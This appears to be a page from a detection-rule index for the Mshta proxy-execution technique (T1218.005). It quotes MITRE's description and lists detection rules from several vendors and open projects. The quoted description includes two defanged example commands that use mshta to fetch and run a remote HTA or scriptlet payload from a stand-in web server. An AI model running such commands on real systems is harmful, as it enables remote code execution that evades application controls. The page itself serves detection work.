Cross-source coverage

T1218.005 / ATT&CK

System Binary Proxy Execution: Mshta

78 rules · 76 families across 7 sources.

Showing deprecated rules · back to the default

From MITRE ATT&CK 19.2

Adversaries may abuse mshta.exe to proxy execution of malicious.hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.

Tactics
Stealth
Platforms
Windows
Telemetry
WinEventLog:SecurityWinEventLog:Sysmon

How MITRE says to detect it DET0506

Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation

Windows Analytic 1397

Detection of mshta.exe execution where command-line arguments reference remote or local HTA/script content (VBScript/JScript) followed by subsequent file creation, network retrieval, or process spawning that indicates payload execution outside standard Internet Explorer security context. Correlation includes parent process lineage, command-line inspection, and network connection creation to untrusted or anomalous endpoints.

  • WinEventLog:Security EventCode=4688
  • WinEventLog:Sysmon EventCode=3, 22
  • WinEventLog:Sysmon EventCode=11

elastic/detection-rules

27 rules
Detection Severity Format
Command and Scripting Interpreter via Windows Scripts High Elastic TOML
Incoming DCOM Lateral Movement via MSHTA High Elastic TOML
Potential Execution via FileFix Phishing Attack High Elastic TOML
Potential Fake CAPTCHA Phishing Attack High Elastic TOML
Script Execution via Microsoft HTML Application High Elastic TOML
Suspicious Managed Code Hosting Process High Elastic TOML
Suspicious Microsoft HTML Application Child Process High Elastic TOML
Suspicious Windows Command Shell Arguments High Elastic TOML
Execution from Unusual Directory - Command Line Medium Elastic TOML
Execution of a Downloaded Windows Script Medium Elastic TOML

+ 17 more from elastic/detection-rules → showing the 10 highest-severity

elastic/protections-artifacts

24 rules
Detection Severity Format
BCDEdit Safe Mode Command Execution Undefined Elastic TOML
Execution of a Downloaded Windows Script via Explorer Undefined Elastic TOML
Execution of a File Downloaded via Windows OpenSSH Undefined Elastic TOML
Execution of a File Written by a Signed Binary Proxy Undefined Elastic TOML
Execution of a Windows Script Downloaded from the Internet Undefined Elastic TOML
Execution of a Windows Script Downloaded via a LOLBIN Undefined Elastic TOML
Execution of a Windows Script File Written by a Suspicious Process Undefined Elastic TOML
Execution of Commonly Abused Utilities via Explorer Trampoline Undefined Elastic TOML
Execution via a Suspicious WMI Client Undefined Elastic TOML
Execution via Outlook Application COM Object Undefined Elastic TOML

+ 14 more from elastic/protections-artifacts → showing the 10 highest-severity

splunk/security_content

12 rules
Detection Severity Format
Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI Undefined SPL
Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download Undefined SPL
Detect mshta inline hta execution Undefined SPL
Detect mshta renamed Undefined SPL
Detect MSHTA Url in Command Line Undefined SPL
Detect Rundll32 Inline HTA Execution Undefined SPL
Mshta spawning Rundll32 OR Regsvr32 Process Undefined SPL
Suspicious mshta child process Undefined SPL
Suspicious mshta spawn Undefined SPL
Windows Mshta Execution In Registry Undefined SPL

+ 2 more from splunk/security_content → showing the 10 highest-severity

SigmaHQ/sigma

8 rules
Detection Severity Format
Csc.EXE Execution Form Potentially Suspicious Parent High Sigma
HackTool - CACTUSTORCH Remote Thread Creation High Sigma
MSHTA Execution with Suspicious File Extensions High Sigma
Potential Baby Shark Malware Activity High Sigma
Potential LethalHTA Technique Execution High Sigma
Remotely Hosted HTA File Executed Via Mshta.EXE High Sigma
Suspicious JavaScript Execution Via Mshta.EXE High Sigma
Suspicious MSHTA Child Process High Sigma

Bert-JanP/Hunting-Queries-Detection-Rules

3 rules
Detection Severity Format
MITRE ATT&CK Mapping Undefined KQL
MSHTA Executions Undefined KQL
Outbound MSHTA Connection Undefined KQL

Wazuh Core Ruleset

2 rules
Detection Severity Format
Office application started mshta.exe and executed scripting command Critical Wazuh XML
Office application started mshta.exe High Wazuh XML

chronicle/detection-rules

2 rules
Detection Severity Format
fireeye_red_team_tool__g2js_suspicious_process_tree Undefined YARA-L
mitre_attack_T1218_005_windows_mshta_remove_usage Undefined YARA-L

Detection rules belong to the projects that publish them and remain under their own licenses. This site indexes and links to them; it claims no rights in them.